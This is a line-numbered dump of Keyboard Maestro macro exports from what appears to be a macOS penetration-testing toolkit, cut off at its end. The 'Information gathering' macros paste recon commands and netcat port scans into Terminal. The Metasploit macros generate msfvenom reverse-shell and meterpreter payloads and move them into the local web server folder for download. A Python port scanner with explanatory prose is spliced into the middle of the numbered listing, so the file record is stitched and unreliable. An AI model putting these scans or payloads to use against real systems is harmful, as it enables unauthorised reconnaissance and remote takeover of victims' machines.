268 | ToggleMacroUID
269 | 38E2E2BB-5898-4929-A43E-8913B5596750
270 | UID
271 | EFD562F2-5884-4E9D-A278-1CB94FE88046
272 |
273 |
274 | Activate
275 | Normal
276 | CreationDate
277 | 603207196.43601894
278 | CustomIconData
279 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
280 | Macros
281 |
282 |
283 | Actions
284 |
285 |
286 | Action
287 | ByPasting
288 | MacroActionType
289 | InsertText
290 | Text
291 | netstat -nr
292 |
293 |
294 | IsDisclosed
295 |
296 | KeyCode
297 | 36
298 | MacroActionType
299 | SimulateKeystroke
300 | Modifiers
301 | 0
302 | ReleaseAll
303 |
304 | TargetApplication
305 |
306 | TargetingType
307 | Front
308 |
309 |
310 | CreationDate
311 | 603207220.833902
312 | CustomIconData
313 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
314 | ModificationDate
315 | 604334224.28068697
316 | Name
317 | Netstat
318 | Triggers
319 |
320 |
321 | MacroTriggerType
322 | StatusMenu
323 |
324 |
325 | UID
326 | 67BE2462-D191-4B2A-801D-A232D1E2AD1C
327 |
328 |
329 | Name
330 | Information gathering
331 | Targeting
332 |
333 | Targeting
334 | Included
335 | TargetingApps
336 |
337 |
338 | BundleIdentifier
339 | com.apple.Terminal
340 | Name
341 | Terminal
342 | NewFile
343 | /System/Applications/Utilities/Terminal.app
344 |
345 |
346 | BundleIdentifier
347 | com.googlecode.iterm2
348 | Name
349 | iTerm
350 | NewFile
351 | /Applications/iTerm.app
352 |
353 |
354 |
355 | ToggleMacroUID
356 | 38E2E2BB-5898-4929-A43E-8913B5596750
357 | UID
358 | EFD562F2-5884-4E9D-A278-1CB94FE88046
359 |
360 |
361 | Activate
362 | Normal
363 | CreationDate
364 | 603207196.43601894
365 | CustomIconData
366 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
367 | Macros
368 |
369 |
370 | Actions
371 |
372 |
373 | Buttons
374 |
375 |
376 | Button
377 | OK
378 |
379 |
380 | Button
381 | List filters
382 | Cancel
383 |
384 |
385 |
386 | Button
387 | Cancel
388 | Cancel
389 |
390 |
391 |
392 | MacroActionType
393 | PromptForUserInput
394 | Prompt
395 | If no filter is applied, the script will use the default settings.
396 | TimeOutAbortsMacro
397 |
398 | Title
399 | System profiler
400 | Variables
401 |
402 |
403 | Default
404 | None|SPParallelATADataType|SPUniversalAccessDataType|SPSecureElementDataType|SPApplicationsDataType|SPAudioDataType|SPBluetoothDataType|SPCameraDataType|SPCardReaderDataType|SPiBridgeDataType|SPDeveloperToolsDataType|SPDiagnosticsDataType|SPDisabledSoftwareDataType|SPDiscBurningDataType|SPEthernetDataType|SPExtensionsDataType|SPFibreChannelDataType|SPFireWireDataType|SPFirewallDataType|SPFontsDataType|SPFrameworksDataType|SPDisplaysDataType|SPHardwareDataType|SPInstallHistoryDataType|SPInternationalDataType|SPLegacySoftwareDataType|SPNetworkLocationDataType|SPLogsDataType|SPManagedClientDataType|SPMemoryDataType|SPNVMeDataType|SPNetworkDataType|SPPCIDataType|SPParallelSCSIDataType|SPPowerDataType|SPPrefPaneDataType|SPPrintersSoftwareDataType|SPPrintersDataType|SPConfigurationProfileDataType|SPRawCameraDataType|SPSASDataType|SPSerialATADataType|SPSPIDataType|SPSmartCardsDataType|SPSoftwareDataType|SPStartupItemDataType|SPStorageDataType|SPSyncServicesDataType|SPThunderboltDataType|SPUSBDataType|SPNetworkVolumeDataType|SPWWANDataType|SPAirPortDataType
405 | Variable
406 | filter
407 |
408 |
409 |
410 |
411 | Conditions
412 |
413 | ConditionList
414 |
415 |
416 | ConditionType
417 | Variable
418 | Variable
419 | Result Button
420 | VariableConditionType
421 | Is
422 | VariableValue
423 | OK
424 |
425 |
426 | ConditionListMatch
427 | All
428 |
429 | ElseActions
430 |
431 |
432 | Action
433 | ByPasting
434 | MacroActionType
435 | InsertText
436 | Text
437 | system_profiler -listDataTypes
438 |
439 |
440 | MacroActionType
441 | IfThenElse
442 | ThenActions
443 |
444 |
445 | Conditions
446 |
447 | ConditionList
448 |
449 |
450 | ConditionType
451 | Variable
452 | Variable
453 | filter
454 | VariableConditionType
455 | DoesNotContain
456 | VariableValue
457 | none
458 |
459 |
460 | ConditionListMatch
461 | All
462 |
463 | ElseActions
464 |
465 |
466 | Action
467 | ByPasting
468 | MacroActionType
469 | InsertText
470 | Text
471 | system_profiler SPSoftwareDataType SPNetworkDataType
472 |
473 |
474 | MacroActionType
475 | IfThenElse
476 | ThenActions
477 |
478 |
479 | Action
480 | ByPasting
481 | MacroActionType
482 | InsertText
483 | Text
484 | system_profiler %Variable%filter%
485 |
486 |
487 | TimeOutAbortsMacro
488 |
489 |
490 |
491 | TimeOutAbortsMacro
492 |
493 |
494 |
495 | IsDisclosed
496 |
497 | KeyCode
498 | 36
499 | MacroActionType
500 | SimulateKeystroke
501 | Modifiers
502 | 0
503 | ReleaseAll
504 |
505 | TargetApplication
506 |
507 | TargetingType
508 | Front
509 |
510 |
511 | CreationDate
512 | 603207220.833902
513 | CustomIconData
514 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
515 | ModificationDate
516 | 603239911.771299
517 | Name
518 | System profiler
519 | Triggers
520 |
521 |
522 | MacroTriggerType
523 | StatusMenu
524 |
525 |
526 | UID
527 | 84FB38A1-5A0A-40ED-9207-A7FFF5BC0F7F
528 |
529 |
530 | Name
531 | Information gathering
532 | Targeting
533 |
534 | Targeting
535 | Included
536 | TargetingApps
537 |
538 |
539 | BundleIdentifier
540 | com.apple.Terminal
541 | Name
542 | Terminal
543 | NewFile
544 | /System/Applications/Utilities/Terminal.app
545 |
546 |
547 | BundleIdentifier
548 | com.googlecode.iterm2
549 | Name
550 | iTerm
551 | NewFile
552 | /Applications/iTerm.app
553 |
554 |
555 |
556 | ToggleMacroUID
557 | 38E2E2BB-5898-4929-A43E-8913B5596750
558 | UID
559 | EFD562F2-5884-4E9D-A278-1CB94FE88046
560 |
561 |
562 | Activate
563 | Normal
564 | CreationDate
565 | 603207196.43601894
566 | CustomIconData
567 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
568 | Macros
569 |
570 |
571 | Actions
572 |
573 |
574 | Buttons
575 |
576 |
577 | Button
578 | OK
579 |
580 |
581 | Button
582 | Cancel
583 | Cancel
584 |
585 |
586 |
587 | MacroActionType
588 | PromptForUserInput
589 | Prompt
590 | Scan for open ports on a local network host or a public IP. Both parameters are required. Because nc runs with -n (no DNS lookups), RHOST must be an IP address, not a hostname. PORTS can be a single port or a range such as 1-2000. A UDP scan (-u) is unreliable: a port that silently drops the probe is reported as open.
591 | TimeOutAbortsMacro
592 |
593 | Title
594 | Port Scanning with NetCat
595 | Variables
596 |
597 |
598 | Default
599 | %Variable%RHOST%
600 | Variable
601 | RHOST
602 |
603 |
604 | Default
605 | 1-2000
606 | Variable
607 | PORTS
608 |
609 |
610 | Default
611 | 0|1
612 | Variable
613 | check UDP ports
614 |
615 |
616 | Default
617 | 0|1
618 | Variable
619 | verbose
620 |
621 |
622 |
623 |
624 | Conditions
625 |
626 | ConditionList
627 |
628 |
629 | ConditionType
630 | Variable
631 | Variable
632 | verbose
633 | VariableConditionType
634 | Is
635 | VariableValue
636 | 1
637 |
638 |
639 | ConditionListMatch
640 | All
641 |
642 | ElseActions
643 |
644 |
645 | Conditions
646 |
647 | ConditionList
648 |
649 |
650 | ConditionType
651 | Variable
652 | Variable
653 | check UDP ports
654 | VariableConditionType
655 | Is
656 | VariableValue
657 | 1
658 |
659 |
660 | ConditionListMatch
661 | All
662 |
663 | ElseActions
664 |
665 |
666 | Action
667 | ByPasting
668 | MacroActionType
669 | InsertText
670 | Text
671 | nc -zn %Variable%RHOST% %Variable%PORTS%
672 |
673 |
674 | MacroActionType
675 | IfThenElse
676 | ThenActions
677 |
678 |
679 | Action
680 | ByPasting
681 | MacroActionType
682 | InsertText
683 | Text
684 | nc -znu %Variable%RHOST% %Variable%PORTS%
685 |
686 |
687 | TimeOutAbortsMacro
688 |
689 |
690 |
691 | MacroActionType
692 | IfThenElse
693 | ThenActions
694 |
695 |
696 | Conditions
697 |
698 | ConditionList
699 |
700 |
701 | ConditionType
702 | Variable
703 | Variable
704 | check UDP ports
705 | VariableConditionType
706 | Is
707 | VariableValue
708 | 1
709 |
710 |
711 | ConditionListMatch
712 | All
713 |
714 | ElseActions
715 |
716 |
717 | Action
718 | ByPasting
719 | MacroActionType
720 | InsertText
721 | Text
722 | nc -znv %Variable%RHOST% %Variable%PORTS%
723 |
724 |
725 | MacroActionType
726 | IfThenElse
727 | ThenActions
728 |
729 |
730 | Action
731 | ByPasting
732 | MacroActionType
733 | InsertText
734 | Text
735 | nc -znvu %Variable%RHOST% %Variable%PORTS%
736 |
737 |
738 | TimeOutAbortsMacro
739 |
740 |
741 |
742 | TimeOutAbortsMacro
743 |
744 |
745 |
746 | IsDisclosed
747 |
748 | KeyCode
749 | 36
750 | MacroActionType
751 | SimulateKeystroke
752 | Modifiers
753 | 0
754 | ReleaseAll
755 |
756 | TargetApplication
757 |
758 | TargetingType
759 | Front
760 |
761 |
762 | CreationDate
763 | 603238576.69605899
764 | CustomIconData
765 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
766 | ModificationDate
767 | 604377700.28512299
768 | Name
769 | Scan PORTS (active)
770 | Triggers
771 |
772 |
773 | MacroTriggerType
774 | StatusMenu
775 |
776 |
777 | UID
778 | E611E7E7-2BAF-435E-BD53-95950A0532C1
779 |
780 |
781 | Name
782 | Information gathering
783 | Targeting
784 |
785 | Targeting
786 | Included
787 | TargetingApps
788 |
789 |
790 | BundleIdentifier
791 | com.apple.Terminal
792 | Name
793 | Terminal
794 | NewFile
795 | /System/Applications/Utilities/Terminal.app
796 |
797 |
798 | BundleIdentifier
799 | com.googlecode.iterm2
800 | Name
801 | iTerm
802 | NewFile
803 | /Applications/iTerm.app
804 |
805 |
806 |
807 | ToggleMacroUID
808 | 38E2E2BB-5898-4929-A43E-8913B5596750
809 | UID
810 | EFD562F2-5884-4E9D-A278-1CB94FE88046
811 |
812 |
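The "Scan PORTS (active)" macro runs `nc -zn RHOST PORTS`, a plain TCP connect scan over a port range written as `1-2000`. The script below, added here as an example and not part of the macro set, does the same thing in Python: it expands the nc-style port spec (ranges and comma lists), performs full TCP connects with a timeout in parallel, and returns the open ports. Like the macro it expects an IP literal for the host. `demo()` binds a throwaway listener on 127.0.0.1 so the example verifies itself offline; there is deliberately no UDP mode, because a UDP "scan" can only infer state from ICMP port-unreachable replies, which is the same weakness `nc -u` has.

```python
"""Added example (not part of the macro set): a TCP connect scanner
equivalent to the macro's `nc -zn RHOST PORTS`, accepting the same
"1-2000" style port specification plus comma-separated lists."""
import socket
from concurrent.futures import ThreadPoolExecutor


def parse_ports(spec):
    """Expand '1-2000', '22,80,443' or '22,80,1000-1010' into a sorted port list."""
    ports = set()
    for part in spec.split(","):
        part = part.strip()
        if not part:
            continue
        if "-" in part:
            lo, hi = (int(x) for x in part.split("-", 1))
        else:
            lo = hi = int(part)
        if not (1 <= lo <= hi <= 65535):
            raise ValueError(f"bad port spec: {part!r}")
        ports.update(range(lo, hi + 1))
    return sorted(ports)


def tcp_port_open(host, port, timeout=0.5):
    """Full TCP handshake, like nc -z: True only if connect() succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, timed out, unreachable
        return False


def scan(host, spec, timeout=0.5, workers=64):
    """Return the open TCP ports among `spec` on `host` (an IP literal)."""
    ports = parse_ports(spec)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: (p, tcp_port_open(host, p, timeout)), ports))
    return [p for p, is_open in results if is_open]


def demo():
    """Self-test against a local listener so the example runs offline.
    Returns (open_port, closed_port, ports_found_open)."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    open_port = listener.getsockname()[1]
    # Reserve-then-release a second ephemeral port so we have one that is
    # almost certainly closed when the scan runs.
    probe = socket.socket()
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]
    probe.close()
    try:
        found = scan("127.0.0.1", f"{open_port},{closed_port}")
    finally:
        listener.close()
    return open_port, closed_port, found


if __name__ == "__main__":
    open_port, closed_port, found = demo()
    print(f"listener on {open_port}, closed {closed_port}, scan found open: {found}")
```

A connect scan completes the three-way handshake on every open port, so it shows up in the target's application logs just as `nc -z` does; keep `workers` modest against hosts behind rate-limiting firewalls or you will see timeouts reported as closed.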
813 | Activate
814 | Normal
815 | CreationDate
816 | 603207196.43601894
817 | CustomIconData
818 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
819 | Macros
820 |
821 |
822 | Actions
823 |
824 |
825 | Buttons
826 |
827 |
828 | Button
829 | OK
830 |
831 |
832 | Button
833 | Cancel
834 | Cancel
835 |
836 |
837 |
838 | MacroActionType
839 | PromptForUserInput
840 | Prompt
841 | Enter a network interface or use default value:
842 | TimeOutAbortsMacro
843 |
844 | Title
845 | ARP cache
846 | Variables
847 |
848 |
849 | Default
850 | en0
851 | Variable
852 | iface
853 |
854 |
855 |
856 |
857 | Conditions
858 |
859 | ConditionList
860 |
861 |
862 | ConditionType
863 | Variable
864 | Variable
865 | iface
866 | VariableConditionType
867 | IsNotEmpty
868 | VariableValue
869 | value
870 |
871 |
872 | ConditionListMatch
873 | All
874 |
875 | ElseActions
876 |
877 |
878 | Action
879 | ByPasting
880 | MacroActionType
881 | InsertText
882 | Text
883 | arp -i en0 -l -a
884 |
885 |
886 | MacroActionType
887 | IfThenElse
888 | ThenActions
889 |
890 |
891 | Action
892 | ByPasting
893 | MacroActionType
894 | InsertText
895 | Text
896 | arp -i %Variable%iface% -l -a
897 |
898 |
899 | TimeOutAbortsMacro
900 |
901 |
902 |
903 | IsDisclosed
904 |
905 | KeyCode
906 | 36
907 | MacroActionType
908 | SimulateKeystroke
909 | Modifiers
910 | 0
911 | ReleaseAll
912 |
913 | TargetApplication
914 |
915 | TargetingType
916 | Front
917 |
918 |
919 | CreationDate
920 | 603207220.833902
921 | CustomIconData
922 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
923 | ModificationDate
924 | 603384853.43131101
925 | Name
926 | ARP cache
927 | Triggers
928 |
929 |
930 | MacroTriggerType
931 | StatusMenu
932 |
933 |
934 | UID
935 | 48BC43C1-647C-4EED-80E6-B1CD8CEBDB23
936 |
937 |
938 | Name
939 | Information gathering
940 | Targeting
941 |
942 | Targeting
943 | Included
944 | TargetingApps
945 |
946 |
947 | BundleIdentifier
948 | com.apple.Terminal
949 | Name
950 | Terminal
951 | NewFile
952 | /System/Applications/Utilities/Terminal.app
953 |
954 |
955 | BundleIdentifier
956 | com.googlecode.iterm2
957 | Name
958 | iTerm
959 | NewFile
960 | /Applications/iTerm.app
961 |
962 |
963 |
964 | ToggleMacroUID
965 | 38E2E2BB-5898-4929-A43E-8913B5596750
966 | UID
967 | EFD562F2-5884-4E9D-A278-1CB94FE88046
968 |
969 |
970 | Activate
971 | Normal
972 | CreationDate
973 | 603207196.43601894
974 | CustomIconData
975 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
976 | Macros
977 |
978 |
979 | Actions
980 |
981 |
982 | Buttons
983 |
984 |
985 | Button
986 | OK
987 | Cancel
988 |
989 |
990 |
991 | Button
992 | All
993 | Cancel
994 |
995 |
996 |
997 | Button
998 | Cancel
999 | Cancel
1000 |
1001 |
1002 |
1003 | MacroActionType
1004 | PromptForUserInput
1005 | Prompt
1006 | Enter something if you want to filter the results:
1007 | TimeOutAbortsMacro
1008 |
1009 | Title
1010 | Active process
1011 | Variables
1012 |
1013 |
1014 | Default
1015 |
1016 | Variable
1017 | FILTER
1018 |
1019 |
1020 |
1021 |
1022 | Conditions
1023 |
1024 | ConditionList
1025 |
1026 |
1027 | ConditionType
1028 | Variable
1029 | Variable
1030 | Result Button
1031 | VariableConditionType
1032 | Is
1033 | VariableValue
1034 | OK
1035 |
1036 |
1037 | ConditionListMatch
1038 | All
1039 |
1040 | ElseActions
1041 |
1042 |
1043 | Conditions
1044 |
1045 | ConditionList
1046 |
1047 |
1048 | ConditionType
1049 | Variable
1050 | Variable
1051 | FILTER
1052 | VariableConditionType
1053 | IsNotEmpty
1054 | VariableValue
1055 | value
1056 |
1057 |
1058 | ConditionListMatch
1059 | All
1060 |
1061 | ElseActions
1062 |
1063 |
1064 | Action
1065 | ByPasting
1066 | MacroActionType
1067 | InsertText
1068 | Text
1069 | ps -ax
1070 |
1071 |
1072 | MacroActionType
1073 | IfThenElse
1074 | ThenActions
1075 |
1076 |
1077 | Action
1078 | ByPasting
1079 | MacroActionType
1080 | InsertText
1081 | Text
1082 | ps -ax | grep %Variable%FILTER%
1083 |
1084 |
1085 | TimeOutAbortsMacro
1086 |
1087 |
1088 |
1089 | MacroActionType
1090 | IfThenElse
1091 | ThenActions
1092 |
1093 |
1094 | Conditions
1095 |
1096 | ConditionList
1097 |
1098 |
1099 | ConditionType
1100 | Variable
1101 | Variable
1102 | FILTER
1103 | VariableConditionType
1104 | IsNotEmpty
1105 | VariableValue
1106 | value
1107 |
1108 |
1109 | ConditionListMatch
1110 | All
1111 |
1112 | ElseActions
1113 |
1114 |
1115 | Action
1116 | ByPasting
1117 | MacroActionType
1118 | InsertText
1119 | Text
1120 | ps -a
1121 |
1122 |
1123 | MacroActionType
1124 | IfThenElse
1125 | ThenActions
1126 |
1127 |
1128 | Action
1129 | ByPasting
1130 | MacroActionType
1131 | InsertText
1132 | Text
1133 | ps -ax | grep %Variable%FILTER%
1134 |
1135 |
1136 | TimeOutAbortsMacro
1137 |
1138 |
1139 |
1140 | TimeOutAbortsMacro
1141 |
1142 |
1143 |
1144 | IsDisclosed
1145 |
1146 | KeyCode
1147 | 36
1148 | MacroActionType
1149 | SimulateKeystroke
1150 | Modifiers
1151 | 0
1152 | ReleaseAll
1153 |
1154 | TargetApplication
1155 |
1156 | TargetingType
1157 | Front
1158 |
1159 |
1160 | CreationDate
1161 | 603207220.833902
1162 | CustomIconData
1163 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
1164 | ModificationDate
1165 | 603680641.58131504
1166 | Name
1167 | Active process
1168 | Triggers
1169 |
1170 |
1171 | MacroTriggerType
1172 | StatusMenu
1173 |
1174 |
1175 | UID
1176 | 188A55B4-16CD-45E7-8F65-DF1ADFF5B7ED
1177 |
1178 |
1179 | Name
1180 | Information gathering
1181 | Targeting
1182 |
1183 | Targeting
1184 | Included
1185 | TargetingApps
1186 |
1187 |
1188 | BundleIdentifier
1189 | com.apple.Terminal
1190 | Name
1191 | Terminal
1192 | NewFile
1193 | /System/Applications/Utilities/Terminal.app
1194 |
1195 |
1196 | BundleIdentifier
1197 | com.googlecode.iterm2
1198 | Name
1199 | iTerm
1200 | NewFile
1201 | /Applications/iTerm.app
1202 |
1203 |
1204 |
1205 | ToggleMacroUID
1206 | 38E2E2BB-5898-4929-A43E-8913B5596750
1207 | UID
1208 | EFD562F2-5884-4E9D-A278-1CB94FE88046
1209 |
1210 |
1211 | Activate
1212 | Normal
1213 | CreationDate
1214 | 603207196.43601894
1215 | CustomIconData
1216 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
1217 | Macros
1218 |
1219 |
1220 | Actions
1221 |
1222 |
1223 | Buttons
1224 |
1225 |
1226 | Button
1227 | OK
1228 |
1229 |
1230 | Button
1231 | Cancel
1232 | Cancel
1233 |
1234 |
1235 |
1236 | IsActive
1237 |
1238 | MacroActionType
1239 | PromptForUserInput
1240 | Prompt
1241 | Enter a network interface or use default value:
1242 | TimeOutAbortsMacro
1243 |
1244 | Title
1245 | Get local IP
1246 | Variables
1247 |
1248 |
1249 | Default
1250 | en0
1251 | Variable
1252 | iface
1253 |
1254 |
1255 |
1256 |
1257 | Action
1258 | ByPasting
1259 | MacroActionType
1260 | InsertText
1261 | Text
1262 | ipconfig getifaddr en0
1263 |
1264 |
1265 | Action
1266 | ByPasting
1267 | IsActive
1268 |
1269 | MacroActionType
1270 | InsertText
1271 | Text
1272 | ipconfig getifaddr %Variable%iface%
1273 |
1274 |
1275 | IsDisclosed
1276 |
1277 | KeyCode
1278 | 36
1279 | MacroActionType
1280 | SimulateKeystroke
1281 | Modifiers
1282 | 0
1283 | ReleaseAll
1284 |
1285 | TargetApplication
1286 |
1287 | TargetingType
1288 | Front
1289 |
1290 |
1291 | CreationDate
1292 | 603384736.16882503
1293 | CustomIconData
1294 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
1295 | ModificationDate
1296 | 603431360.34979701
1297 | Name
1298 | Get local IP
1299 | Triggers
1300 |
1301 |
1302 | MacroTriggerType
1303 | StatusMenu
1304 |
1305 |
1306 | UID
1307 | 79B9F67B-ACB6-4B4C-B814-EE84AAF44F06
1308 |
1309 |
1310 | Name
1311 | Information gathering
1312 | Targeting
1313 |
1314 | Targeting
1315 | Included
1316 | TargetingApps
1317 |
1318 |
1319 | BundleIdentifier
1320 | com.apple.Terminal
1321 | Name
1322 | Terminal
1323 | NewFile
1324 | /System/Applications/Utilities/Terminal.app
1325 |
1326 |
1327 | BundleIdentifier
1328 | com.googlecode.iterm2
1329 | Name
1330 | iTerm
1331 | NewFile
1332 | /Applications/iTerm.app
1333 |
1334 |
1335 |
1336 | ToggleMacroUID
1337 | 38E2E2BB-5898-4929-A43E-8913B5596750
1338 | UID
1339 | EFD562F2-5884-4E9D-A278-1CB94FE88046
1340 |
1341 |
1342 | Activate
1343 | Normal
1344 | CreationDate
1345 | 603207196.43601894
1346 | CustomIconData
1347 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
1348 | Macros
1349 |
1350 |
1351 | Actions
1352 |
1353 |
1354 | Buttons
1355 |
1356 |
1357 | Button
1358 | OK
1359 |
1360 |
1361 | Button
1362 | Cancel
1363 | Cancel
1364 |
1365 |
1366 |
1367 | MacroActionType
1368 | PromptForUserInput
1369 | Prompt
1370 | Choose the tool you want to use. The opendns method works if your ISP doesn't replace DNS requests (which it shouldn't).
1371 | TimeOutAbortsMacro
1372 |
1373 | Title
1374 | Get external IP
1375 | Variables
1376 |
1377 |
1378 | Default
1379 | opendns|ipify
1380 | Variable
1381 | select your tool
1382 |
1383 |
1384 |
1385 |
1386 | Conditions
1387 |
1388 | ConditionList
1389 |
1390 |
1391 | ConditionType
1392 | Variable
1393 | Variable
1394 | select your tool
1395 | VariableConditionType
1396 | Is
1397 | VariableValue
1398 | opendns
1399 |
1400 |
1401 | ConditionListMatch
1402 | All
1403 |
1404 | ElseActions
1405 |
1406 |
1407 | Action
1408 | ByPasting
1409 | MacroActionType
1410 | InsertText
1411 | Text
1412 | curl -s https://api.ipify.org && echo
1413 |
1414 |
1415 | MacroActionType
1416 | IfThenElse
1417 | ThenActions
1418 |
1419 |
1420 | Action
1421 | ByPasting
1422 | MacroActionType
1423 | InsertText
1424 | Text
1425 | dig +short myip.opendns.com @resolver1.opendns.com
1426 |
1427 |
1428 | TimeOutAbortsMacro
1429 |
1430 |
1431 |
1432 | IsDisclosed
1433 |
1434 | KeyCode
1435 | 36
1436 | MacroActionType
1437 | SimulateKeystroke
1438 | Modifiers
1439 | 0
1440 | ReleaseAll
1441 |
1442 | TargetApplication
1443 |
1444 | TargetingType
1445 | Front
1446 |
1447 |
1448 | CreationDate
1449 | 603384736.16882503
1450 | CustomIconData
1451 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
1452 | ModificationDate
1453 | 603385946.64691997
1454 | Name
1455 | Get external IP
1456 | Triggers
1457 |
1458 |
1459 | MacroTriggerType
1460 | StatusMenu
1461 |
1462 |
1463 | UID
1464 | C4746C77-BDD8-4CD8-A67A-6B7DCA020B70
1465 |
1466 |
1467 | Name
1468 | Information gathering
1469 | Targeting
1470 |
1471 | Targeting
1472 | Included
1473 | TargetingApps
1474 |
1475 |
1476 | BundleIdentifier
1477 | com.apple.Terminal
1478 | Name
1479 | Terminal
1480 | NewFile
1481 | /System/Applications/Utilities/Terminal.app
1482 |
1483 |
1484 | BundleIdentifier
1485 | com.googlecode.iterm2
1486 | Name
1487 | iTerm
1488 | NewFile
1489 | /Applications/iTerm.app
1490 |
1491 |
1492 |
1493 | ToggleMacroUID
1494 | 38E2E2BB-5898-4929-A43E-8913B5596750
1495 | UID
1496 | EFD562F2-5884-4E9D-A278-1CB94FE88046
1497 |
1498 |
1499 |
1500 |
--------------------------------------------------------------------------------
/ressources/macros/Metasploit Macros.kmmacros:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | Activate
7 | Normal
8 | CreationDate
9 | 603248839.71637106
10 | CustomIconData
11 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
12 | Macros
13 |
14 |
15 | Actions
16 |
17 |
18 | Action
19 | ByPasting
20 | MacroActionType
21 | InsertText
22 | Text
23 | msfdb init && msfconsole
24 |
25 |
26 | IsDisclosed
27 |
28 | KeyCode
29 | 36
30 | MacroActionType
31 | SimulateKeystroke
32 | Modifiers
33 | 0
34 | ReleaseAll
35 |
36 | TargetApplication
37 |
38 | TargetingType
39 | Front
40 |
41 |
42 | CreationDate
43 | 603158737.91990697
44 | CustomIconData
45 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
46 | ModificationDate
47 | 604530521.83623803
48 | Name
49 | Open metasploit
50 | Triggers
51 |
52 |
53 | MacroTriggerType
54 | StatusMenu
55 |
56 |
57 | UID
58 | 5A71A45C-870B-4ED1-A4F2-A85F6B9BB0D7
59 |
60 |
61 | Name
62 | Metasploit
63 | Targeting
64 |
65 | Targeting
66 | Included
67 | TargetingApps
68 |
69 |
70 | BundleIdentifier
71 | com.apple.Terminal
72 | Name
73 | Terminal
74 | NewFile
75 | /System/Applications/Utilities/Terminal.app
76 |
77 |
78 | BundleIdentifier
79 | com.googlecode.iterm2
80 | Name
81 | iTerm
82 | NewFile
83 | /Applications/iTerm.app
84 |
85 |
86 |
87 | ToggleMacroUID
88 | BD3A91E8-F9C6-479E-A719-8FFE5B74C03F
89 | UID
90 | B24AC723-6106-4902-8682-F49EDDB71CDD
91 |
92 |
93 | Activate
94 | Normal
95 | CreationDate
96 | 603248839.71637106
97 | CustomIconData
98 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
99 | Macros
100 |
101 |
102 | Actions
103 |
104 |
105 | Buttons
106 |
107 |
108 | Button
109 | OK
110 |
111 |
112 | Button
113 | Cancel
114 | Cancel
115 |
116 |
117 |
118 | MacroActionType
119 | PromptForUserInput
120 | Prompt
121 | Please enter the details for these variables. (filename is optional)
122 |
123 | TimeOutAbortsMacro
124 |
125 | Title
126 | Create payload
127 | Variables
128 |
129 |
130 | Default
131 | %Variable%LHOST%
132 | Variable
133 | LHOST
134 |
135 |
136 | Default
137 | %Variable%LPORT%
138 | Variable
139 | LPORT
140 |
141 |
142 | Default
143 | cmd/unix/reverse_netcat|cmd/unix/reverse_bash|cmd/unix/reverse_python|cmd/unix/reverse_ruby|cmd/unix/bind_netcat|python/shell_bind_tcp|python/shell_reverse_tcp|python/meterpreter/reverse_tcp
144 | Variable
145 | Payload
146 |
147 |
148 | Default
149 | %Variable%Filename%
150 | Variable
151 | Filename
152 |
153 |
154 |
155 |
156 | Conditions
157 |
158 | ConditionList
159 |
160 |
161 | ConditionType
162 | Variable
163 | Variable
164 | Filename
165 | VariableConditionType
166 | IsEmpty
167 | VariableValue
168 | value
169 |
170 |
171 | ConditionListMatch
172 | All
173 |
174 | ElseActions
175 |
176 |
177 | Action
178 | ByPasting
179 | MacroActionType
180 | InsertText
181 | Text
182 | msfvenom -p %Variable%Payload% lhost=%Variable%LHOST% lport=%Variable%LPORT% > /tmp/%Variable%Filename% && sudo mv /tmp/%Variable%Filename% /Library/WebServer/Documents/%Variable%Filename%
183 |
184 |
185 | MacroActionType
186 | IfThenElse
187 | ThenActions
188 |
189 |
190 | Action
191 | ByPasting
192 | MacroActionType
193 | InsertText
194 | Text
195 | msfvenom -p %Variable%Payload% lhost=%Variable%LHOST% lport=%Variable%LPORT%
196 |
197 |
198 | TimeOutAbortsMacro
199 |
200 |
201 |
202 | IsDisclosed
203 |
204 | KeyCode
205 | 36
206 | MacroActionType
207 | SimulateKeystroke
208 | Modifiers
209 | 0
210 | ReleaseAll
211 |
212 | TargetApplication
213 |
214 | TargetingType
215 | Front
216 |
217 |
218 | CreationDate
219 | 603158737.91990697
220 | CustomIconData
221 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
222 | ModificationDate
223 | 604517561.09793901
224 | Name
225 | Create Payload (metasploit)
226 | Triggers
227 |
228 |
229 | MacroTriggerType
230 | StatusMenu
231 |
232 |
233 | UID
234 | AFEA5F8A-5CAA-43A3-BEB0-E9D2BEC262F2
235 |
236 |
237 | Name
238 | Metasploit
239 | Targeting
240 |
241 | Targeting
242 | Included
243 | TargetingApps
244 |
245 |
246 | BundleIdentifier
247 | com.apple.Terminal
248 | Name
249 | Terminal
250 | NewFile
251 | /System/Applications/Utilities/Terminal.app
252 |
253 |
254 | BundleIdentifier
255 | com.googlecode.iterm2
256 | Name
257 | iTerm
258 | NewFile
259 | /Applications/iTerm.app
260 |
261 |
262 |
263 | ToggleMacroUID
264 | BD3A91E8-F9C6-479E-A719-8FFE5B74C03F
265 | UID
266 | B24AC723-6106-4902-8682-F49EDDB71CDD
267 |
268 |
269 | Activate
270 | Normal
271 | CreationDate
272 | 603248839.71637106
273 | CustomIconData
274 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app
275 | Macros
276 |
277 |
278 | Actions
279 |
280 |
281 | Action
282 | ByPasting
283 | MacroActionType
284 | InsertText
285 | Text
